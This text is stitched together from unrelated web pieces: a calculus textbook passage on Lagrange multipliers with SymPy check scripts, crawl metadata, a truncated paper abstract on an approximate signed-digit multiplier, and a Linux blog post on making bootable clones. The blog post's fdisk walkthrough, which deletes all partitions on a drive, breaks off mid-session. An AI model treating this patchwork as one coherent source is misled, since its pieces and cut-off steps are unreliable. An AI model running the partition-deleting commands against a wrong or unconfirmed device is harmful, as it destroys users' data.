1. The objective function is $$f(x,y)=48x+96y−x^2−2xy−9y^2.$$ To determine the constraint function, we divide both sides by $$4$$, which gives $$5x+y=54.$$ The constraint function is equal to the left-hand side, so $$g(x,y)=5x+y.$$ The problem asks us to solve for the maximum value of $$f$$, subject to this constraint.
2.
So, we calculate the gradients of both $$f$$ and $$g$$: \begin{align*} \vecs ∇f(x,y)&=(48−2x−2y)\hat{\mathbf i}+(96−2x−18y)\hat{\mathbf j}\\[5pt]\vecs ∇g(x,y)&=5\hat{\mathbf i}+\hat{\mathbf j}. \end{align*} The equation $$\vecs ∇f(x,y)=λ\vecs ∇g(x,y)$$ becomes $(48−2x−2y)\hat{\mathbf i}+(96−2x−18y)\hat{\mathbf j}=λ(5\hat{\mathbf i}+\hat{\mathbf j}),\nonumber$ which can be rewritten as $(48−2x−2y)\hat{\mathbf i}+(96−2x−18y)\hat{\mathbf j}=λ5\hat{\mathbf i}+λ\hat{\mathbf j}.\nonumber$ We then set the coefficients of $$\hat{\mathbf i}$$ and $$\hat{\mathbf j}$$ equal to each other: \begin{align*} 48−2x−2y&=5λ \\[5pt] 96−2x−18y&=λ. \end{align*} The equation $$g(x,y)=k$$ becomes $$5x+y=54$$. Therefore, the system of equations that needs to be solved is \begin{align*} 48−2x−2y&=5λ \\[5pt] 96−2x−18y&=λ \\[5pt]5x+y&=54. \end{align*}
3. We use the left-hand side of the second equation to replace $$λ$$ in the first equation: \begin{align*} 48−2x−2y&=5(96−2x−18y) \\[5pt]48−2x−2y&=480−10x−90y \\[5pt] 8x&=432−88y \\[5pt] x&=54−11y. \end{align*} Then we substitute this into the third equation: \begin{align*} 5(54−11y)+y&=54\\[5pt] 270−55y+y&=54\\[5pt]216&=54y \\[5pt]y&=4. \end{align*} Since $$x=54−11y,$$ this gives $$x=10.$$
4. We then substitute $$(10,4)$$ into $$f(x,y)=48x+96y−x^2−2xy−9y^2,$$ which gives \begin{align*} f(10,4)&=48(10)+96(4)−(10)^2−2(10)(4)−9(4)^2 \\[5pt] & =480+384−100−80−144=540.\end{align*} Therefore the maximum profit that can be attained, subject to budgetary constraints, is $$\$540,000$$ with a production level of $$10,000$$ golf balls and $$4$$ hours of advertising bought per month. Let’s check to make sure this truly is a maximum. The endpoints of the line that defines the constraint are $$(10.8,0)$$ and $$(0,54)$$. Let’s evaluate $$f$$ at both of these points: \begin{align*} f(10.8,0)&=48(10.8)+96(0)−10.8^2−2(10.8)(0)−9(0^2) \\[5pt] &=401.76 \\[5pt] f(0,54)&=48(0)+96(54)−0^2−2(0)(54)−9(54^2) \\[5pt] &=−21,060. \end{align*} The second value represents a loss, since no golf balls are produced. Neither of these values exceeds $$540$$, so it seems that our extremum is a maximum value of $$f$$, subject to the given constraint.

Exercise $$\PageIndex{2}$$: Optimizing the Cobb-Douglas function

A company has determined that its production level is given by the Cobb-Douglas function $$f(x,y)=2.5x^{0.45}y^{0.55}$$ where $$x$$ represents the total number of labor hours in $$1$$ year and $$y$$ represents the total capital input for the company. Suppose $$1$$ unit of labor costs $$\$40$$ and $$1$$ unit of capital costs $$\$50$$. Use the method of Lagrange multipliers to find the maximum value of $$f(x,y)=2.5x^{0.45}y^{0.55}$$ subject to a budgetary constraint of $$\$500,000$$ per year.

Hint

Use the problem-solving strategy for the method of Lagrange multipliers.

Answer

Subject to the given constraint, a maximum production level of approximately $$13,890$$ occurs with $$5625$$ labor hours and $$5500$$ units of total capital input.
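If you have access to a computer algebra system, results like those in Example $$\PageIndex{2}$$ can be double-checked by solving the Lagrange system symbolically. The following is a minimal sketch in Python, assuming the third-party SymPy library is available; the symbol names and the use of `sympy.solve` are illustrative choices, not part of the method itself.

```python
# Verify Example 2: maximize f(x, y) = 48x + 96y - x^2 - 2xy - 9y^2
# subject to 5x + y = 54, by solving grad f = lambda * grad g
# together with the constraint. (Requires the SymPy package.)
import sympy as sp

x, y, lam = sp.symbols('x y lambda', real=True)

f = 48*x + 96*y - x**2 - 2*x*y - 9*y**2   # profit, in thousands of dollars
g = 5*x + y - 54                          # constraint written as g(x, y) = 0

equations = [
    sp.Eq(sp.diff(f, x), lam * sp.diff(g, x)),   # 48 - 2x - 2y = 5*lambda
    sp.Eq(sp.diff(f, y), lam * sp.diff(g, y)),   # 96 - 2x - 18y = lambda
    sp.Eq(g, 0),                                 # 5x + y = 54
]

for sol in sp.solve(equations, [x, y, lam], dict=True):
    print(sol, '->  f =', f.subs(sol))           # expect x = 10, y = 4, f = 540
```

The same pattern can be adapted to Exercise $$\PageIndex{2}$$ by swapping in the Cobb-Douglas objective $$2.5x^{0.45}y^{0.55}$$ and the budget constraint $$40x+50y=500{,}000$$.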
In the case of an objective function with three variables and a single constraint function, it is possible to use the method of Lagrange multipliers to solve an optimization problem as well. An example of an objective function with three variables could be the Cobb-Douglas function in Exercise $$\PageIndex{2}$$: $$f(x,y,z)=x^{0.2}y^{0.4}z^{0.4},$$ where $$x$$ represents the cost of labor, $$y$$ represents capital input, and $$z$$ represents the cost of advertising. The method is the same as for the method with a function of two variables; the equations to be solved are \begin{align*} \vecs ∇f(x,y,z)&=λ\vecs ∇g(x,y,z) \\[5pt] g(x,y,z)&=k. \end{align*}

Example $$\PageIndex{3}$$: Lagrange Multipliers with a Three-Variable Objective Function

Find the minimum value of the function $$f(x,y,z)=x^2+y^2+z^2$$ subject to the constraint $$x+y+z=1.$$

Solution:

1. The objective function is $$f(x,y,z)=x^2+y^2+z^2.$$ To determine the constraint function, we take the variable expression on the left-hand side of the constraint equation $$x+y+z=1$$, which gives the constraint function as $$g(x,y,z)=x+y+z.$$
2. Next, we calculate $$\vecs ∇f(x,y,z)$$ and $$\vecs ∇g(x,y,z):$$ \begin{align*} \vecs ∇f(x,y,z)&=⟨2x,2y,2z⟩ \\[5pt] \vecs ∇g(x,y,z)&=⟨1,1,1⟩. \end{align*} This leads to the equations \begin{align*} ⟨2x,2y,2z⟩&=λ⟨1,1,1⟩ \\[5pt] x+y+z&=1 \end{align*} which can be rewritten in the following form: \begin{align*} 2x&=λ\\[5pt]2y&=λ \\[5pt]2z&=λ \\[5pt]x+y+z&=1. \end{align*}
3. Since each of the first three equations has $$λ$$ on the right-hand side, we know that $$2x=2y=2z$$ and all three variables are equal to each other. Substituting $$y=x$$ and $$z=x$$ into the last equation yields $$3x=1,$$ so $$x=\frac{1}{3}$$ and $$y=\frac{1}{3}$$ and $$z=\frac{1}{3}$$ which corresponds to a critical point on the constraint curve.
4. Then, we evaluate $$f$$ at the point $$\left(\frac{1}{3},\frac{1}{3},\frac{1}{3}\right)$$: $f\left(\frac{1}{3},\frac{1}{3},\frac{1}{3}\right)=\left(\frac{1}{3}\right)^2+\left(\frac{1}{3}\right)^2+\left(\frac{1}{3}\right)^2=\frac{3}{9}=\frac{1}{3}$ Therefore, a possible extremum of the function is $$\frac{1}{3}$$. To verify it is a minimum, choose other points that satisfy the constraint from either side of the point we obtained above and calculate $$f$$ at those points. For example, \begin{align*} f(1,0,0)&=1^2+0^2+0^2=1 \\[5pt] f(0,−2,3)&=0^2+(−2)^2+3^2=13. \end{align*} Both of these values are greater than $$\frac{1}{3}$$, leading us to believe the extremum is a minimum, subject to the given constraint.

Exercise $$\PageIndex{3}$$

Use the method of Lagrange multipliers to find the minimum value of the function $f(x,y,z)=x+y+z \nonumber$ subject to the constraint $$x^2+y^2+z^2=1.$$

Hint

Use the problem-solving strategy for the method of Lagrange multipliers with an objective function of three variables.

Answer

Evaluating $$f$$ at both points we obtained gives us \begin{align*} f\left(\dfrac{\sqrt{3}}{3},\dfrac{\sqrt{3}}{3},\dfrac{\sqrt{3}}{3}\right)&=\dfrac{\sqrt{3}}{3}+\dfrac{\sqrt{3}}{3}+\dfrac{\sqrt{3}}{3}=\sqrt{3} \\ f\left(−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3}\right)&=−\dfrac{\sqrt{3}}{3}−\dfrac{\sqrt{3}}{3}−\dfrac{\sqrt{3}}{3}=−\sqrt{3}\end{align*} Since the constraint set (the unit sphere) is closed and bounded, we compare these values and conclude that $$f$$ has a relative minimum of $$−\sqrt{3}$$ at the point $$\left(−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3},−\dfrac{\sqrt{3}}{3}\right)$$, subject to the given constraint.
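As with the two-variable case, a computer algebra system can confirm the three-variable computation. Below is a minimal sketch, again assuming SymPy is available; it simply restates the system from Example $$\PageIndex{3}$$ and lets `sympy.solve` do the algebra.

```python
# Check Example 3: minimize f(x, y, z) = x^2 + y^2 + z^2 subject to x + y + z = 1.
# (Requires the SymPy package; symbol names are illustrative.)
import sympy as sp

x, y, z, lam = sp.symbols('x y z lambda', real=True)

f = x**2 + y**2 + z**2
g = x + y + z - 1                     # constraint written as g(x, y, z) = 0

# One equation per variable (grad f = lambda * grad g), plus the constraint.
eqs = [sp.Eq(sp.diff(f, v), lam * sp.diff(g, v)) for v in (x, y, z)]
eqs.append(sp.Eq(g, 0))

for sol in sp.solve(eqs, [x, y, z, lam], dict=True):
    print(sol, '->  f =', f.subs(sol))   # expect x = y = z = 1/3 and f = 1/3
```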
### Problems with Two Constraints

The method of Lagrange multipliers can be applied to problems with more than one constraint. In this case the objective function, $$w$$, is a function of three variables: $w=f(x,y,z)$ and it is subject to two constraints: $g(x,y,z)=0 \; \text{and} \; h(x,y,z)=0.$ There are two Lagrange multipliers, $$λ_1$$ and $$λ_2$$, and the system of equations becomes \begin{align*} \vecs ∇f(x_0,y_0,z_0)&=λ_1\vecs ∇g(x_0,y_0,z_0)+λ_2\vecs ∇h(x_0,y_0,z_0) \\[5pt] g(x_0,y_0,z_0)&=0\\[5pt] h(x_0,y_0,z_0)&=0 \end{align*}

Example $$\PageIndex{4}$$: Lagrange Multipliers with Two Constraints

Find the maximum and minimum values of the function $f(x,y,z)=x^2+y^2+z^2 \nonumber$ subject to the constraints $$z^2=x^2+y^2$$ and $$x+y−z+1=0.$$

Solution:

1. The objective function is $$f(x,y,z)=x^2+y^2+z^2.$$ To determine the constraint functions, we first subtract $$z^2$$ from both sides of the first constraint, which gives $$x^2+y^2−z^2=0$$, so $$g(x,y,z)=x^2+y^2−z^2$$. The second constraint function is $$h(x,y,z)=x+y−z+1.$$
2. We then calculate the gradients of $$f,g,$$ and $$h$$: \begin{align*} \vecs ∇f(x,y,z)&=2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k} \\[5pt] \vecs ∇g(x,y,z)&=2x\hat{\mathbf i}+2y\hat{\mathbf j}−2z\hat{\mathbf k} \\[5pt] \vecs ∇h(x,y,z)&=\hat{\mathbf i}+\hat{\mathbf j}−\hat{\mathbf k}. \end{align*} The equation $$\vecs ∇f(x,y,z)=λ_1\vecs ∇g(x,y,z)+λ_2\vecs ∇h(x,y,z)$$ becomes $2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k}=λ_1(2x\hat{\mathbf i}+2y\hat{\mathbf j}−2z\hat{\mathbf k})+λ_2(\hat{\mathbf i}+\hat{\mathbf j}−\hat{\mathbf k}),$ which can be rewritten as $2x\hat{\mathbf i}+2y\hat{\mathbf j}+2z\hat{\mathbf k}=(2λ_1x+λ_2)\hat{\mathbf i}+(2λ_1y+λ_2)\hat{\mathbf j}−(2λ_1z+λ_2)\hat{\mathbf k}.$ Next, we set the coefficients of $$\hat{\mathbf i}$$, $$\hat{\mathbf j}$$, and $$\hat{\mathbf k}$$ equal to each other: \begin{align*}2x&=2λ_1x+λ_2 \\[5pt]2y&=2λ_1y+λ_2 \\[5pt]2z&=−2λ_1z−λ_2. \end{align*} The two equations that arise from the constraints are $$z^2=x^2+y^2$$ and $$x+y−z+1=0$$. Combining these equations with the previous three equations gives \begin{align*} 2x&=2λ_1x+λ_2 \\[5pt]2y&=2λ_1y+λ_2 \\[5pt]2z&=−2λ_1z−λ_2 \\[5pt]z^2&=x^2+y^2 \\[5pt]x+y−z+1&=0. \end{align*}
3. The first three equations contain the variable $$λ_2$$. Solving the third equation for $$λ_2$$ and replacing into the first and second equations reduces the number of equations to four: \begin{align*}2x&=2λ_1x−2λ_1z−2z \\[5pt] 2y&=2λ_1y−2λ_1z−2z\\[5pt] z^2&=x^2+y^2\\[5pt] x+y−z+1&=0. \end{align*} Next, we solve the first and second equation for $$λ_1$$. The first equation gives $$λ_1=\dfrac{x+z}{x−z}$$, the second equation gives $$λ_1=\dfrac{y+z}{y−z}$$. We set the right-hand side of each equation equal to each other and cross-multiply: \begin{align*} \dfrac{x+z}{x−z}&=\dfrac{y+z}{y−z} \\[5pt](x+z)(y−z)&=(x−z)(y+z) \\[5pt]xy−xz+yz−z^2&=xy+xz−yz−z^2 \\[5pt]2yz−2xz&=0 \\[5pt]2z(y−x)&=0. \end{align*} Therefore, either $$z=0$$ or $$y=x$$. If $$z=0$$, then the first constraint becomes $$0=x^2+y^2$$. The only real solution to this equation is $$x=0$$ and $$y=0$$, which gives the ordered triple $$(0,0,0)$$. This point does not satisfy the second constraint, so it is not a solution. Next, we consider $$y=x$$, which reduces the number of equations to three: \begin{align*}y &= x \\[5pt] z^2 &= x^2 +y^2 \\[5pt] x + y -z+1&=0. \end{align*} We substitute the first equation into the second and third equations: \begin{align*} z^2 &= x^2 +x^2 \\[5pt] x+x-z+1 &=0. \end{align*} Then, we solve the second equation for $$z$$, which gives $$z=2x+1$$.
We then substitute this into the first equation, \begin{align*} z^2 &= 2x^2 \\[5pt] (2x +1)^2 &= 2x^2 \\[5pt] 4x^2 + 4x +1 &= 2x^2 \\[5pt] 2x^2 +4x +1 &=0, \end{align*} and use the quadratic formula to solve for $$x$$: $x = \dfrac{-4 \pm \sqrt{4^2 -4(2)(1)} }{2(2)} = \dfrac{-4\pm \sqrt{8}}{4} = \dfrac{-4 \pm 2\sqrt{2}}{4} = -1 \pm \dfrac{\sqrt{2}}{2}.$ Recall $$y=x$$, so this solves for $$y$$ as well. Then, $$z=2x+1$$, so $z = 2x +1 =2 \left( -1 \pm \dfrac{\sqrt{2}}{2} \right) +1 = -2 + 1 \pm \sqrt{2} = -1 \pm \sqrt{2} .$ Therefore, there are two ordered triplet solutions: $\left( -1 + \dfrac{\sqrt{2}}{2} , -1 + \dfrac{\sqrt{2}}{2} , -1 + \sqrt{2} \right) \; \text{and} \; \left( -1 -\dfrac{\sqrt{2}}{2} , -1 -\dfrac{\sqrt{2}}{2} , -1 -\sqrt{2} \right).$
4. We substitute $$\left(−1+\dfrac{\sqrt{2}}{2},−1+\dfrac{\sqrt{2}}{2}, −1+\sqrt{2}\right)$$ into $$f(x,y,z)=x^2+y^2+z^2$$, which gives \begin{align*} f\left( -1 + \dfrac{\sqrt{2}}{2}, -1 + \dfrac{\sqrt{2}}{2} , -1 + \sqrt{2} \right) &= \left( -1+\dfrac{\sqrt{2}}{2} \right)^2 + \left( -1 + \dfrac{\sqrt{2}}{2} \right)^2 + (-1+\sqrt{2})^2 \\[5pt] &= \left( 1-\sqrt{2}+\dfrac{1}{2} \right) + \left( 1-\sqrt{2}+\dfrac{1}{2} \right) + (1 -2\sqrt{2} +2) \\[5pt] &= 6-4\sqrt{2}. \end{align*} Then, we substitute $$\left(−1−\dfrac{\sqrt{2}}{2}, −1−\dfrac{\sqrt{2}}{2}, −1−\sqrt{2}\right)$$ into $$f(x,y,z)=x^2+y^2+z^2$$, which gives \begin{align*} f\left(−1−\dfrac{\sqrt{2}}{2}, −1−\dfrac{\sqrt{2}}{2}, −1−\sqrt{2} \right) &= \left( -1-\dfrac{\sqrt{2}}{2} \right)^2 + \left( -1 - \dfrac{\sqrt{2}}{2} \right)^2 + (-1-\sqrt{2})^2 \\[5pt] &= \left( 1+\sqrt{2}+\dfrac{1}{2} \right) + \left( 1+\sqrt{2}+\dfrac{1}{2} \right) + (1 +2\sqrt{2} +2) \\[5pt] &= 6+4\sqrt{2}. \end{align*} $$6+4\sqrt{2}$$ is the maximum value and $$6−4\sqrt{2}$$ is the minimum value of $$f(x,y,z)$$, subject to the given constraints.

Exercise $$\PageIndex{4}$$

Use the method of Lagrange multipliers to find the minimum value of the function $f(x,y,z)=x^2+y^2+z^2$ subject to the constraints $$2x+y+2z=9$$ and $$5x+5y+7z=29.$$

Hint

Use the problem-solving strategy for the method of Lagrange multipliers with two constraints.

Answer

$$f(2,1,2)=9$$ is a relative minimum of $$f$$, subject to the given constraints.

## Key Concepts

• An objective function combined with one or more constraints is an example of an optimization problem.
• To solve optimization problems, we apply the method of Lagrange multipliers using a four-step problem-solving strategy.

### Key Equations

• Method of Lagrange multipliers, one constraint $$\vecs ∇f(x,y)=λ\vecs ∇g(x,y)$$ $$g(x,y)=k$$
• Method of Lagrange multipliers, two constraints $$\vecs ∇f(x_0,y_0,z_0)=λ_1\vecs ∇g(x_0,y_0,z_0)+λ_2\vecs ∇h(x_0,y_0,z_0)$$ $$g(x_0,y_0,z_0)=0$$ $$h(x_0,y_0,z_0)=0$$

### Glossary

constraint
an inequality or equation involving one or more variables that is used in an optimization problem; the constraint enforces a limit on the possible solutions for the problem

Lagrange multiplier
the constant (or constants) used in the method of Lagrange multipliers; in the case of one constant, it is represented by the variable $$λ$$

method of Lagrange multipliers
a method of solving an optimization problem subject to one or more constraints

objective function
the function that is to be maximized or minimized in an optimization problem

optimization problem
calculation of a maximum or minimum value of a function of several variables, often using Lagrange multipliers
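As a closing note, the two-constraint system in Example $$\PageIndex{4}$$ can also be handed to a computer algebra system. This is a minimal sketch, assuming SymPy is available; it is only a symbolic cross-check of the worked solution above, not a replacement for it.

```python
# Cross-check Example 4: extremize f = x^2 + y^2 + z^2 subject to
# z^2 = x^2 + y^2 and x + y - z + 1 = 0, using two multipliers.
# (Requires the SymPy package; symbol names are illustrative.)
import sympy as sp

x, y, z, l1, l2 = sp.symbols('x y z lambda1 lambda2', real=True)

f = x**2 + y**2 + z**2
g = x**2 + y**2 - z**2        # first constraint rewritten as g = 0
h = x + y - z + 1             # second constraint, h = 0

# grad f = l1 * grad g + l2 * grad h, together with both constraints.
eqs = [sp.Eq(sp.diff(f, v), l1*sp.diff(g, v) + l2*sp.diff(h, v)) for v in (x, y, z)]
eqs += [sp.Eq(g, 0), sp.Eq(h, 0)]

for sol in sp.solve(eqs, [x, y, z, l1, l2], dict=True):
    print(sol, '->  f =', sp.simplify(f.subs(sol)))
# Expect the two points (-1 ± sqrt(2)/2, -1 ± sqrt(2)/2, -1 ± sqrt(2)),
# with f = 6 - 4*sqrt(2) (minimum) and f = 6 + 4*sqrt(2) (maximum).
```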
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 3, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9912946224212646, "perplexity": 219.68558407451417}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103821173.44/warc/CC-MAIN-20220630122857-20220630152857-00682.warc.gz"}
http://curaben.it/hczb/6-digit-number-sauce.html
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2195180505514145, "perplexity": 1504.9137065866348}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657138718.61/warc/CC-MAIN-20200712113546-20200712143546-00296.warc.gz"}
https://deepai.org/publication/amr-mul-an-approximate-maximally-redundant-signed-digit-multiplier
DeepAI

# AMR-MUL: An Approximate Maximally Redundant Signed Digit Multiplier

In this paper, we present an energy-efficient, yet high-speed approximate maximally redundant signed digit (MRSD) multiplier (called AMR-MUL) based on a parallel structure. For the reduction stage, we suggest several approximate Full-Adder (FA) reduction cells with average positive and negative errors obtained by simplifying the structure of an exact FA cell. The optimum selection of these cells for each partial product reduction stage provides the lowest possible error, turning this task into a design space exploration problem. We also provide a branch-and-bound design space exploration algorithm to find the optimal assignment of reduction cells based on a predefined constraint (i.e., the width of the approximate part) by the user. The effectiveness of the proposed (Radix-16) multiplier design is assessed under different digit counts and approximate border column. The results show that the energy consumption of the MRSD multiplier is reduced by 7x at the cost of a 1.6
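The abstract only names the idea of approximate FA reduction cells with mixed positive and negative errors; the paper's actual cell designs are not reproduced here. As a rough, hypothetical illustration (the simplified cell below is invented for this example, not taken from AMR-MUL), the sketch compares an exact full adder against one simplified variant and tabulates its signed error over all eight input combinations:

```python
from itertools import product

def exact_fa(a, b, cin):
    """Exact full adder: returns (sum, carry)."""
    s = a ^ b ^ cin
    c = (a & b) | (a & cin) | (b & cin)
    return s, c

def approx_fa(a, b, cin):
    """Hypothetical simplified cell: the carry is approximated by input a
    and the sum by b XOR cin. Only an illustration of how removing gates
    trades exactness for smaller, cheaper logic."""
    return b ^ cin, a

def error_profile(cell):
    """Signed error of the 2-bit result (2*carry + sum) over all inputs."""
    errs = []
    for a, b, cin in product((0, 1), repeat=3):
        s_e, c_e = exact_fa(a, b, cin)
        s_a, c_a = cell(a, b, cin)
        errs.append((2 * c_a + s_a) - (2 * c_e + s_e))
    return errs

errs = error_profile(approx_fa)
print("signed errors:", errs)                 # mix of positive and negative values
print("mean error:", sum(errs) / len(errs))   # averages to 0 for this particular cell
```

Choosing a mix of such cells per reduction column so that positive and negative errors tend to cancel is, in spirit, the assignment problem that the paper's branch-and-bound search is described as solving.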
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8939505219459534, "perplexity": 3272.615593184207}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446708046.99/warc/CC-MAIN-20221126180719-20221126210719-00612.warc.gz"}
https://looseassociations.com/?p=189
# Making Linux Bootable Clones A bootable clone is a disk that holds a complete copy of a running system that’s ready to boot. Bootable clones can be a critical part of your backup strategy. # Why Bootable Clones If you’re truly hardcore, and just want a command reference so you don’t leave out any steps, skip to the expert mode recipe. If you have mission critical computers in your life, I hope you are already aware of the importance of good backups. I’ve noticed, though, that a lot of people think that just having copies of all their files is enough. They’ll set up, say, an automated cloud backup — and figure they’re done. They’re probably in for a nasty surprise if disaster hits. A lot of the information in your computer isn’t in the files, but in various nebulous kinds of metadata: where the files are located, various configuration files, license keys, special directories, file links, permissions… Just restoring all your files isn’t enough if you want to be back online as fast as possible. My primary laptop is a macOS machine. I’ve long employed SuperDuper and Carbon Copy Cloner to make bootable clones. If my laptop gets destroyed, lost, or stolen, all I have to do is plug a clone into any recent-vintage Macintosh, reboot, and I’m back in production. I don’t even have to wait for files to copy. By contrast, last year I tried a scratch restore from a Time Machine backup, and it took almost two days to get reasonable working system, and several weeks after that before most of the little glitches were smoothed out. In fairness, my setup is a lot more complicated than the average user, but I also get the sense that most users are largely unaware of how tied they are to complicated configurations that they’ve (consciously or otherwise) fine-tuned to their workflow over the course of years. I also maintain a hundred or so Linux-based systems. I’ve searched from time to time, but surprisingly I’ve never found a SuperDuper-like utility for making bootable clones. It’s long been on my list of things to create, but a recent systemd-related disaster left me with a crashed mission-critical server for over five days. That, combined with a horrible bug in the duplicity backup system, resulted in more downtime than all of my systems combined over the previous ten years. # Current Options • Clonezilla isn’t a bad option. It will create a sector-by-sector clone onto a new hard drive. It is file-system agnostic so your copy is almost guaranteed to work as well as the original. Optionally, you can put your clones into image files. They won’t boot, but can be restored to then-bootable media. However: • Clonezilla requires that you boot from a live CD to make your backups. That means that your system is unusable during the hours that it can take to make the backup (not acceptable for mission-critical servers). • Clonezilla requires that the system have a working optical drive. • When using Clonezilla, you’re pretty much stuck with working from the console (or spending time configuring ssh). In my world, that means a certain amount of physical discomfort. I much prefer the comfort of working from my mother’s basement, chugging Mountain Dew while my Dorito-dust covered fingers clack away on my sticky gaming keyboard. • Clonezilla requires that the destination disk be as large or larger than the source. I once tried to make a clone of a 2 terabyte server disk to an “identical” 2 TB disk. 
For whatever reason (I didn’t investigate, possibly some defective sectors), the destination drive was a few blocks smaller than the source disk. After many hours of copying, the backup failed. • Filesystem copies using cp, tar, or rsync can make sure that you get all your files. The usual advice is then “install a fresh system, and copy the important files from your backup to the new bootable system.” Guess what: it won’t work. Yes, you can copy your /home directory, but that won’t restore any of your system configuration. Over time, you’ve probably installed multiple software packages with multiple configuration files, perl and python modules, all scattered through the /etc and /var directories and configuration files, thoroughly mixed in with install-specific files and data that you can’t just replace with information from the old system. You’ll lose log files. You’ll lose startup sequences. Unless you run a vanilla system (and I doubt any plain-vanilla users are here reading this) you’ll be in for hours and hours of reconfiguration and figuring out which “important” files should be copied, and which must not be, and which configuration files need to be carefully merged with those on the new system. • dd. I use and love dd, and it meets my criterion for simplicity, but it has some real limitations. • The destination drive has to be as large or larger than the source drive. • It isn’t smart about what it copies. I have a server with a 1.5TB drive, but it’s only using 86GB (only a fraction of which changes between backups). When using dd, I pretty much have to copy the entire 1.5TB which takes hours. Yes, I could re-partition the drive and only dd the partition but then the clone wouldn’t be bootable and I’d lose the simplicity. • It doesn’t do incremental backup. # Simplicity is Key People get cagey about backups. They want to be selective (who needs to be able to access three years of temporary cache files?). They want to conserve backup space. That’s all well and good, but your bootable clone is not the place to do this. Just buy a backup drive that’s as large or larger than your primary and back up everything. You don’t want to be scrambling to get back online and discover that a rule you created to save a few MB of drive space inadvertently blocked the backup of a critical file. # Creating a Bootable Clone This technique has been tested with Ubuntu 14.04, Ubuntu 18.04, Devuan ascii, as well as recent Arch releases. It should work with Debian-derived distros and other systems that use the GRUB2 bootloader. • plug in backup drive • open a bash shell; you need to be root so… sudo -s • next, figure out which drive you’re working with fdisk -l • and identify which drive is the backup drive; we’re going to assume its /dev/sdx. So remember: whenever you see /dev/sdx, be sure to replace the x with the appropriate device indicator. ## First Time? Prepare the Bare Drive WARNING! This will erase all data on whatever drive you specify. Specify the wrong drive, and you’ll erase your source instead of your destination. Be careful! • If you already have a bootable clone, skip the next three steps and you’ll just incrementally update your clone. • The next three steps initialize a bare drive for first-time cloning. Whatever device you specify *will be erased,* so make sure you’re erasing the disk you think you are. Remember to change /dev/sdx to your actual device designation. You might have to repeat the “d” command several times if there are multiple existing partitions. 
When in doubt, use defaults. fdisk /dev/sdx • here’s what your fdisk session should look like — though you will have to display the list of partition types and use the version-specific code for the EFI and swap partitions: Welcome to fdisk (util-linux 2.29.2). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Command (m for help): d Partition number (1-3, default 3): Partition 3 has been deleted. [repeat until you get an error because all the partitions have been deleted] Command (m for help): n Partition type p primary (0 primary, 0 extended, 4 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (1-4, default 1): First sector (2048-468862127, default 2048): Last sector, +sectors or +size{K,M,G,T,P} (2048-468862127, default 468862127): +512M Created a new partition 1 of type 'Linux' and of size 512 MiB. Command (m for help): t Selected partition 1 Partition type (type L to list all types): XX Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'. Command (m for help): n Partition type p primary (1 primary, 0 extended, 3 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (2-4, default 2): First sector (1050624-468862127, default 1050624): Last sector, +sectors or +size{K,M,G,T,P} (1050624-468862127, default 468862127): +213G [subtract the desired swap size from the total disk size; this was a 223GB disk as reported by fdisk, and I want about a 10GB swap] Created a new partition 2 of type 'Linux' and of size 213 GiB. Command (m for help): n Partition type p primary (2 primary, 0 extended, 2 free) e extended (container for logical partitions) Select (default p): Using default response p. Partition number (3,4, default 3): First sector (447744000-468862127, default 447744000): Last sector, +sectors or +size{K,M,G,T,P} (447744000-468862127, default 468862127): Created a new partition 3 of type 'Linux' and of size 10.1 GiB. Command (m for help): t Partition number (1-3, default 3): Partition type (type L to list all types): XX Changed 